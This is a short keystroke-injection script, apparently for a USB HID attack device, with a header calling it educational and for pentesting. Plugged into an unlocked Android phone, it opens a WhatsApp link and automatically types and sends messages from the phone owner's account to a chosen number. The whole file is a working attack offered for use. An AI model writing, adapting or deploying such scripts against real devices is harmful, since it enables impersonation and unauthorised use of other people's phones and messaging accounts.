REM # ---------------------------------------------------------------------------------------------------
REM # Disclaimer: This script is for educational and pentest purposes ONLY! Use at your own risk!!
REM # Title: Send Whatsapp Message to anyone
REM # Author: Dinesh Kumar LinkedIn: dhina016
REM # Target: Tested on Android 11 device, it may require changes to work on newer versions
REM # Note: This script will only work if the target have whatsapp without lock
REM # ---------------------------------------------------------------------------------------------------

REM # Enter your phone here
PrintLine https://wa.me/+91xxxxxxxxxx
Delay 3000

REM # Enter your message here 
Print This is new message from dhina

PressRelease KEY_TAB
Delay 1000
PressRelease KEY_TAB
Delay 1000
PressRelease KEY_ENTER
DELAY 1000

REM # Enter your another message here 
Print This is another new message from dhina
Delay 1000
PressRelease KEY_TAB
Delay 1000
PressRelease KEY_TAB
Delay 1000
PressRelease KEY_ENTER
